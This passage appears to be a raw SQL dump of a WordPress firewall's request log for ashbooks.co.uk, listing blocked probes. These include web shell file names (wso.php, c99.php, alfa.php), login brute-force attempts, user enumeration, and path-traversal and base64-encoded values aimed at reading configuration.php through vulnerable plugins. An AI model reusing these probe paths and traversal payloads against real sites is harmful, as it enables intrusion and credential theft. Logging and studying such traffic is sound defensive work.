Safari\\/537.36\"}','MN1xfu9ImJ0AQ4ChrPS8bFDT',0,1638348412.9017,3324,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SlhTJxgDRKmafe18qiztIWjk',0,1638348417.3918,382,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/maint/repair-bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I914BUThfsrnLvARV8P5KyYm',0,1638348419.4083,419,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/edit-tag-menu.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SlrGiEDCc9MqBtnpXPgVIwRo',0,1638348421.1366,357,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/tablepress_controllers.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MRp2ETmgKrHYdnbeLIJoxNc6',0,1638348423.9078,135,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/includes/block-line.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fRCq1pk9SFE4awiWH5nJTxbZ',0,1638348427.3717,393,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-admin/css/modern/colors.css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ruj2k3N0mgtHwbirL47oFeMT',0,1638348429.4262,4005,'','GET',403,0,700,0,1,'',0),('34.122.91.192',578444224,'','https://ashbooks.co.uk/wp-includes/sys.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','p3mo0SUQLfwFIAOerRT1h8Bt',0,1638348437.2384,677,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','uq7X2f1tAe9SKML8Nn3Bhasx',0,1638348739.0767,466,'','POST',403,0,600,0,1,'',0),('199.249.230.158',3355043486,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','ujOiz6RBgleQFwtZ80Nqon1v',0,1638355720.2781,434,'','POST',403,0,600,0,1,'',0),('69.30.217.110',1159649646,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','zZgUFHuqTJmsxO20AMS98I4W',0,1638357155.5514,166,'','POST',403,0,600,0,1,'',0),('20.74.148.83',340431955,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','eiLAH5SKudwRmx63z2N8osEl',0,1638357474.8242,1533,'','GET',403,0,520,0,1,'',0),('82.223.55.111',1390360431,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','7vgopePTCO1qi8kJAQyw0Sj4',0,1638363508.6148,495,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','c1V4QjKornGXg8zMOpHb6kwq',0,1638364352.8456,184,'','POST',403,0,600,0,1,'',0),('185.103.199.199',3110586311,'','https://ashbooks.co.uk/accesson.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','ogcHTCAJtVezUYbrKF6MuDEw',0,1638365677.4239,398,'','GET',403,0,700,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','qfPGzXgmhkspKTMxSeQWvOAJ',0,1638373117.4363,393,'','GET',403,0,700,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/s_e.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','6wNhxvt0jWTyqHpuoB12DZMG',0,1638375886.8600,148,'','POST',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3biWE285wUmVLnNcCyq7duM6',0,1638376403.4348,521,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YpBUoxWVOsG54fuCdNEjtybw',0,1638376404.0652,431,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/aa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pCuVnrPvfiJ0ILqDHyYNBG51',0,1638376404.6122,132,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/matricule.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yhO80Ff3V2bcmnJKug9eIXQl',0,1638376405.6771,138,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hz1xBr27AgJLPwfsqTElYMhI',0,1638376405.9176,136,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nPt6TwzDcYaGNjp19BJU4Hei',0,1638376406.1853,471,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Cl23EO4gSJmY1z7AwKbrpFi6',0,1638376406.7648,194,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SuY4I9JqB3OCpGDhX6rcNlzv',0,1638376407.0729,395,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SwICYBZKnaFQmRDqE9j034Xo',0,1638376407.5777,130,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jGuYMR8T0q9ZwAx34yaHhIrN',0,1638376407.8099,120,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q6yBRItihsu4U0bnO5kTaxY9',0,1638376408.0491,358,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LgNX89KsEHofjnOQ3d2zvtwF',0,1638376408.5084,130,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cG4hFmN9TxyQjl2pobCEL0i3',0,1638376408.7469,121,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xClIcPzs9raXwtub2qBKE37F',0,1638376408.9699,443,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nD9xjwT5Ao6UqHRkGJEyPavi',0,1638376409.5339,121,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q45v8szX76ZRboaVGDyEwuS2',0,1638376409.7783,142,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HSU3PtG75g6zfLEic9WJNXlu',0,1638376410.0618,438,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BiW9lOHsJ0T1rQ7aVPYyLCZw',0,1638376410.6460,123,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wQXmMZxYy1Ata5d9v3qK8kcL',0,1638376410.9247,134,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1Giruq8xTWNaVJZQElb0vhSf',0,1638376411.2150,412,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7ZNYnb9sJ2mwrqU60VkOC4fa',0,1638376411.7980,129,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iugYZt0k6bySAFPjxfB5wdEG',0,1638376412.0947,415,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hO6mfEAGsDdpVS9yvL450Jc2',0,1638376412.6180,137,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hcJ2rjvgTUp0eVyfA4sDzSdo',0,1638376412.8640,142,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7NV32fonrRbqdeF5WIxtXJCY',0,1638376413.1088,418,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8JlSUf15agpNXsqrTIG2n0we',0,1638376413.6479,129,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZWXGEOF6ATdN51lSuQLb70fh',0,1638376413.8801,132,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bYxLdiB0WpetQqovDXwE1m96',0,1638376414.1139,408,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tM2Y6DfF90i57xR4grEZlwsX',0,1638376414.6408,143,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kVoNI8OhK6z9cXbfaQZpAMeB',0,1638376414.8937,595,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aJkmsS1W7jT4pPzhFeDBHIgZ',0,1638376415.7850,658,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oJ46bfgUlOF3v0VWKNcHCRzI',0,1638376416.5828,129,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oX0vJI7std3lDNZPu2OVqwQL',0,1638376416.8567,120,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DcinQLwPYCeHKIkbjq3dWTg8',0,1638376417.1228,408,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YU4j9rMl7fy16CzSOsbtmoaB',0,1638376417.6778,118,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qG1wWyta5hoIsD7Y2RxPujAO',0,1638376417.9479,395,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ewaEU7WS65TO4cimk0CVLhYB',0,1638376418.4519,126,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QifRGoxtcg0KbAWdhyejw17I',0,1638376418.6867,120,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/utchiha.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5tRdIcZYjbeGzJDkPgxHFoVs',0,1638376418.9148,131,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/finder.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wkLGsghXSCdiWAlf7vYRJZ02',0,1638376419.1469,339,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DJQmxY8qE4PIS9eLGHB6n7wh',0,1638376419.5949,128,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/green.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','beQWqgrG1J0NmC2a9XMhVYHs',0,1638376419.8321,120,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','g7naPNISzkVpYds4oWH1J5lc',0,1638376420.0609,351,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/asap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nwkYmsT2PS5RHegF8b1J9hNI',0,1638376420.5138,118,'','GET',403,0,700,0,1,'',0),('197.207.173.224',3318722016,'','https://ashbooks.co.uk/ayoub.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Jvm0Gj2PxKMy5X4CfhIopHWV',0,1638376420.7457,135,'','GET',403,0,700,0,1,'',0),('102.154.13.217',1721372121,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','4PNwLpRrAEi1hzCXubUBxVvO',0,1638377275.0756,1154,'','GET',403,0,520,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','la3S1OrAdxLYu9kp72EftoBQ',0,1638380361.8384,632,'','POST',403,0,600,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','qiH6aGty5OzDTmjnxNQ9R8EK',0,1638380391.7188,488,'','POST',403,0,600,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','0Xn4TmUY6fjuky9szgxG2I1R',0,1638380399.2434,419,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=','','{\"1\":\"python-requests\\/2.26.0\"}','Li4OhRM3yCeHGkIxlDzbpwZK',0,1638380409.5399,424,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','oCXAg8xW2lbKFtGBdEaSRpki',0,1638380410.6020,397,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','9EhHeuKnWTtFBs8x2ZkJy5Nz',0,1638380414.5120,402,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes','','{\"1\":\"python-requests\\/2.26.0\"}','RPM3xhY7Jdm0jKA4GrqOHu91',0,1638380416.9500,377,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=','','{\"1\":\"python-requests\\/2.26.0\"}','0C9tVra6mvEuJSX4idfqULyg',0,1638380417.9575,386,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_Li4vY29uZmlndXJhdGlvbi5waHA=&download=1&token=1','','{\"1\":\"python-requests\\/2.26.0\"}','qO1tFmZjuJWalfADeXKQUPLy',0,1638380419.0315,479,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','jBEthnAGMm7fQ45c9X6r8Jp3',0,1638380420.8124,383,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/components/com_creativecontactform/fileupload/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','Q7W0BrYKe4zCfM1k63Dq5uJy',0,1638380421.7355,394,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/doajaxfileupload.php','','{\"1\":\"python-requests\\/2.26.0\"}','KmRQndc5e2BkAyHw0rTta1P9',0,1638380424.7954,154,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','PWyBmSIQ1iwsK6v7UZAXaoGH',0,1638380425.5087,588,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/ajaxupload.php','','{\"1\":\"python-requests\\/2.26.0\"}','wWK5n3vRXSdCyiNM9hbAfJe1',0,1638380426.9686,422,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ehuaW18APTtmpSGx4BnKVqOf',0,1638380428.0218,430,'','POST',403,0,600,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/ninetofive/scripts/doajaxfileupload.php','','{\"1\":\"python-requests\\/2.26.0\"}','bTxcLAi8HBf6SdlaWmrokJyK',0,1638380430.7714,404,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/user-meta/framework/helper/uploader.php','','{\"1\":\"python-requests\\/2.26.0\"}','FHzEZeRO3vQ7frJ5XcICWpYh',0,1638380447.2888,422,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/surveys.php?id=66969696','','{\"1\":\"python-requests\\/2.26.0\"}','ZBQv3arV6lbLtm5DY1sFUqpX',0,1638380448.2833,397,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=configuration.php','','{\"1\":\"python-requests\\/2.26.0\"}','UtZwqDmETxk6QNBz0pMIXKhV',0,1638380450.1144,410,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','h0bZwYSLOVBetya2GEj7Fv63',0,1638380451.9374,756,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/flipbook/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','1I4GiY7Brx2tTa9qKNjsbhWM',0,1638380454.2100,648,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php','','{\"1\":\"python-requests\\/2.26.0\"}','OoTsKI3dvl9PjhNCB805LYmn',0,1638380455.6895,432,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/plugins/gallery-plugin/upload/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','jveHDKOFGS0sNUaPX4AB3hCi',0,1638380457.5420,551,'','GET',403,0,700,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/lightspeed/functions/jwpanel/scripts/valums_uploader/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','18InPF67VExlz5uWqthLH4CY',0,1638380459.0318,387,'','GET',403,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','uePd8KiRqvBfjzlh5MHxtmg1',0,1638380459.9627,432,'','POST',403,0,600,0,1,'',0),('105.189.21.216',1773999576,'','https://ashbooks.co.uk/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php','','{\"1\":\"python-requests\\/2.26.0\"}','DGWwIKEueQBJS3kPmoZTq0hR',0,1638380460.1812,415,'','GET',403,0,700,0,1,'',0),('105.189.